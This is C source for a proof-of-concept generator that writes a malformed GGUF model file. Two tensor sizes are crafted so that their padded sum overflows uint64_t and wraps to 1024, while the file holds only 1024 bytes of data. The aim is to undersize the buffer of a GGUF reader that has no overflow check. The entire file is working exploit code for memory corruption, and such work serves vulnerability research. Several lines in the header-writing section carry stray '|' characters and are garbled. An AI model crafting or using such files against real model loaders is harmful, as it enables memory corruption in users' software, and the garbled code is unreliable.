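// PoC generator for a GGUF file whose two tensors are sized so that summing
// their 32-byte-padded data sizes overflows uint64_t and wraps around to the
// small TARGET_CTX_SIZE_AFTER_OVERFLOW value. A GGUF reader that accumulates
// these sizes into ctx->size without an overflow check is expected to end up
// with a far smaller size than the tensor metadata actually claims.
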
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef GGML_MAX_DIMS
# define GGML_MAX_DIMS 4
#endif

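// Minimal stand-ins for the ggml type enum and its size helpers; only the
// types this PoC writes out are modeled.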
typedef enum {
    POC_GGML_TYPE_F32 = 0,
    POC_GGML_TYPE_F16 = 1,
    POC_GGML_TYPE_Q4_0 = 2,
} poc_ggml_type;

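// Bytes per element: 2 for F16, 4 for F32, 0 for anything else.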
size_t poc_ggml_type_size(poc_ggml_type type) {
    if (type == POC_GGML_TYPE_F16) {
        return 2;
    }
    if (type == POC_GGML_TYPE_F32) {
        return 4;
    }

    return 0;
}

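// Elements per block. F16 and F32 are not block-quantized, so this is always 1
// here; quantized types such as Q4_0 are not handled by this PoC.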
int poc_ggml_blck_size(poc_ggml_type type) {
    if (type == POC_GGML_TYPE_F16 || type == POC_GGML_TYPE_F32) {
        return 1;
    }

    return 1;
}

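// Approximates how the reader derives a 1-D tensor's byte count:
// ne[0] * type_size / block_size.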
size_t calculate_ggml_nbytes_in_poc(int64_t ne_dim0, poc_ggml_type type) {
    if (ne_dim0 < 0) {
        return 0;
    }
    size_t ts = poc_ggml_type_size(type);
    int bs = poc_ggml_blck_size(type);
    if (bs == 0) {
        return 0;
    }

    uint64_t ne_u = (uint64_t) ne_dim0;
    uint64_t num = ne_u * ts;
    return num / (uint64_t) bs;
}

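// On-disk fields of a GGUF v3 tensor-info entry: a length-prefixed name
// followed by the dimension count, the dimensions, the type and the data
// offset.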
struct poc_gguf_tensor_info_header {
    uint64_t name_len;
};

struct poc_gguf_tensor_info_meta {
    uint32_t n_dims;
    int64_t ne[GGML_MAX_DIMS];
    uint32_t type;
    uint64_t offset;
};

#define NUM_POC_TENSORS 2
#define ALIGNMENT 32

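// Round x up to the next multiple of align (mirrors ggml's GGML_PAD).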
uint64_t POC_GGML_PAD(uint64_t x, uint64_t align) {
    return ((x + align - 1) / align) * align;
}

#ifndef GGUF_VERSION
# define GGUF_VERSION 3
#endif

int main(int ac, char ** av) {
    if (ac != 2) {
        printf("usage: %s <filename>\n", av[0]);
        exit(1);
    }

    const char * filename = av[1];

    uint32_t version = GGUF_VERSION;
    uint64_t n_tensors_val = NUM_POC_TENSORS;
    uint64_t n_kv_val = 0;

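    // The value the reader's accumulated ctx->size should wrap around to once
    // the uint64_t sum overflows.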
    const uint64_t TARGET_CTX_SIZE_AFTER_OVERFLOW = 1024ULL;

    poc_ggml_type type0 = POC_GGML_TYPE_F16;
    poc_ggml_type type1 = POC_GGML_TYPE_F16;
    size_t ts0 = poc_ggml_type_size(type0);
    size_t ts1 = poc_ggml_type_size(type1);

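    // Tensor 0 is made enormous (on the order of 0xD000000000000000 bytes) and
    // rounded down so its size is a multiple of both the element size and
    // ALIGNMENT, so padding leaves it unchanged.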
    uint64_t nbytes0_target = 0xD000000000000000ULL;

    if (nbytes0_target % ts0 != 0) {
        nbytes0_target = (nbytes0_target / ts0) * ts0;
    }
    if (nbytes0_target % ALIGNMENT != 0) {
        nbytes0_target = (nbytes0_target / ALIGNMENT) * ALIGNMENT;
    }

    int64_t ne0 = nbytes0_target / ts0;
    size_t nbytes0 = calculate_ggml_nbytes_in_poc(ne0, type0);

    uint64_t padded_nbytes0 = POC_GGML_PAD(nbytes0, ALIGNMENT);
    printf("Target final ctx->size after overflow: 0x%" PRIx64 "\n", TARGET_CTX_SIZE_AFTER_OVERFLOW);
    printf("Calculated ne0: %" PRId64 "\n", ne0);
    printf("Designed nbytes0: 0x%" PRIx64 ", resulting padded_nbytes0: 0x%" PRIx64 "\n", nbytes0, padded_nbytes0);

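    // Size tensor 1 so the padded sizes wrap modulo 2^64 to exactly the target:
    // padded_nbytes1 = (2^64 - padded_nbytes0) + TARGET_CTX_SIZE_AFTER_OVERFLOW.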
    uint64_t target_padded_nbytes1 = (0xFFFFFFFFFFFFFFFFULL - padded_nbytes0 + 1ULL) + TARGET_CTX_SIZE_AFTER_OVERFLOW;

    uint64_t nbytes1_target = target_padded_nbytes1;
    if (nbytes1_target % ts1 != 0) {
        nbytes1_target = (nbytes1_target / ts1) * ts1;
    }
    if (nbytes1_target % ALIGNMENT != 0 && POC_GGML_PAD(nbytes1_target, ALIGNMENT) != target_padded_nbytes1) {
        printf("Warning: nbytes1_target (0x%" PRIx64 ") might not perfectly pad to target_padded_nbytes1 (0x%" PRIx64
               ").\n",
               nbytes1_target, target_padded_nbytes1);
    }

    int64_t ne1 = nbytes1_target / ts1;
    if (ne1 <= 0) {
        fprintf(stderr,
                "Error: Calculated ne1 (%" PRId64
                ") is not positive. Adjust nbytes0_target or TARGET_CTX_SIZE_AFTER_OVERFLOW.\n",
                ne1);
        exit(1);
    }
    size_t nbytes1 = calculate_ggml_nbytes_in_poc(ne1, type1);

    printf("Calculated ne1: %" PRId64 "\n", ne1);
    printf("Designed nbytes1: 0x%" PRIx64 " (aiming for its padded version to be 0x%" PRIx64 ")\n", nbytes1,
           target_padded_nbytes1);

    FILE * fp = fopen(filename, "wb");
    if (!fp) {
        perror("Unable to write out file");
        exit(1);
    }

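    // GGUF header: magic, version, tensor count, key/value count.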
printf("[+] Writing GGUF header: %s\n", filename); |
|
fwrite("GGUF", 4, 1, fp); |
|
fwrite(&version, sizeof(version), 1, fp); |
|
fwrite(&n_tensors_val, sizeof(n_tensors_val), 1, fp); |
|
fwrite(&n_kv_val, sizeof(n_kv_val), 1, fp); |
|
|
|
uint64_t calculated_offset_for_ggml = 0; |
|
|
|
|
|
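    // Tensor info 0: "tensor_A", a single huge F16 dimension at data offset 0.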
    char name0_str[] = "tensor_A";
    struct poc_gguf_tensor_info_header th0;
    struct poc_gguf_tensor_info_meta tm0;
    th0.name_len = strlen(name0_str);
    tm0.n_dims = 1;
    tm0.ne[0] = ne0;
    tm0.type = type0;
    tm0.offset = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);

    fwrite(&th0.name_len, sizeof(th0.name_len), 1, fp);
    fwrite(name0_str, th0.name_len, 1, fp);
    fwrite(&tm0.n_dims, sizeof(tm0.n_dims), 1, fp);
    fwrite(tm0.ne, sizeof(tm0.ne[0]), tm0.n_dims, fp);
    fwrite(&tm0.type, sizeof(tm0.type), 1, fp);
    fwrite(&tm0.offset, sizeof(tm0.offset), 1, fp);
    printf(" - Tensor 0 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64
           ", offset_written: 0x%" PRIx64 ")\n",
           name0_str, tm0.ne[0], tm0.type, nbytes0, tm0.offset);

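    // Track the running data size the way the reader is expected to: pad the
    // current offset, then add the tensor's byte count.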
    calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
    calculated_offset_for_ggml += nbytes0;
    printf(" ggml's ctx->size after tensor 0 (before next pad): 0x%" PRIx64 "\n", calculated_offset_for_ggml);

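    // Tensor info 1: "tensor_B", sized so that the padded sum wraps around.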
    char name1_str[] = "tensor_B";
    struct poc_gguf_tensor_info_header th1;
    struct poc_gguf_tensor_info_meta tm1;
    th1.name_len = strlen(name1_str);
    tm1.n_dims = 1;
    tm1.ne[0] = ne1;
    tm1.type = type1;
    tm1.offset = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);

    fwrite(&th1.name_len, sizeof(th1.name_len), 1, fp);
    fwrite(name1_str, th1.name_len, 1, fp);
    fwrite(&tm1.n_dims, sizeof(tm1.n_dims), 1, fp);
    fwrite(tm1.ne, sizeof(tm1.ne[0]), tm1.n_dims, fp);
    fwrite(&tm1.type, sizeof(tm1.type), 1, fp);
    fwrite(&tm1.offset, sizeof(tm1.offset), 1, fp);
    printf(" - Tensor 1 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64
           ", offset_written: 0x%" PRIx64 ")\n",
           name1_str, tm1.ne[0], tm1.type, nbytes1, tm1.offset);

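    // Replay the accumulation locally to confirm the uint64_t wrap occurs.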
    uint64_t prev_calc_offset = calculated_offset_for_ggml;
    calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
    calculated_offset_for_ggml += nbytes1;
    printf(
        " PoC's internal calculated_offset_for_ggml after tensor 1 (before next pad for hypothetical T2): 0x%" PRIx64
        " (prev was 0x%" PRIx64 ", added unpadded nbytes1 0x%" PRIx64 " to a padded sum)\n",
        calculated_offset_for_ggml, prev_calc_offset, nbytes1);
    if (calculated_offset_for_ggml < POC_GGML_PAD(prev_calc_offset, ALIGNMENT) && nbytes1 > 0) {
        printf(" >>>> UINT64 OVERFLOW DETECTED in PoC's internal calculated_offset_for_ggml sum <<<<\n");
    }

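    // Sanity check: the sum of the two padded sizes should equal the target
    // after wrapping.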
    uint64_t final_gguf_ctx_size_in_ggml_dot_cpp = POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT);
    printf(" EXPECTED FINAL gguf.cpp ctx->size (sum of padded nbytes): 0x%" PRIx64 "\n",
           final_gguf_ctx_size_in_ggml_dot_cpp);
    if (final_gguf_ctx_size_in_ggml_dot_cpp == TARGET_CTX_SIZE_AFTER_OVERFLOW) {
        printf(" SUCCESS: EXPECTED FINAL gguf.cpp ctx->size matches TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64
               ")!\n",
               TARGET_CTX_SIZE_AFTER_OVERFLOW);
    } else {
        printf(" MISMATCH: EXPECTED FINAL gguf.cpp ctx->size (0x%" PRIx64
               ") != TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 ")!\n",
               final_gguf_ctx_size_in_ggml_dot_cpp, TARGET_CTX_SIZE_AFTER_OVERFLOW);
    }

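    // Pad the file so the tensor data section starts on an ALIGNMENT boundary
    // (GGUF's default alignment of 32).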
    long current_pos = ftell(fp);
    long padded_pos = POC_GGML_PAD(current_pos, ALIGNMENT);
    if (padded_pos > current_pos) {
        char pad_bytes[ALIGNMENT] = { 0 };
        printf(" Padding file from %ld to %ld to align data section.\n", current_pos, padded_pos);
        fwrite(pad_bytes, 1, padded_pos - current_pos, fp);
    }

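    // Only TARGET_CTX_SIZE_AFTER_OVERFLOW bytes of tensor data are written,
    // far less than the sizes advertised in the tensor infos.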
    char dummy_data_padding[TARGET_CTX_SIZE_AFTER_OVERFLOW];

    memset(dummy_data_padding, 0xAA, sizeof(dummy_data_padding));

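    // Fill the start of the data section with a recognizable float value so
    // that anything read back as tensor_A is identifiable.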
    size_t num_elements_to_fill_for_tensor_a = 100;
    if (num_elements_to_fill_for_tensor_a * sizeof(float) > TARGET_CTX_SIZE_AFTER_OVERFLOW) {
        num_elements_to_fill_for_tensor_a = TARGET_CTX_SIZE_AFTER_OVERFLOW / sizeof(float);
    }

    float tensor_a_expected_value = 100.0f;
    for (size_t k = 0; k < num_elements_to_fill_for_tensor_a; ++k) {
        if ((k + 1) * sizeof(float) <= sizeof(dummy_data_padding)) {
            memcpy(&dummy_data_padding[k * sizeof(float)], &tensor_a_expected_value, sizeof(float));
        } else {
            break;
        }
    }
    printf(" Filled the first %zu float elements of dummy_data_padding with %f for tensor_A.\n",
           num_elements_to_fill_for_tensor_a, tensor_a_expected_value);

    fwrite(dummy_data_padding, 1, sizeof(dummy_data_padding), fp);

    fclose(fp);
    printf("[+] Finished writing PoC GGUF file.\n");
    return 0;
}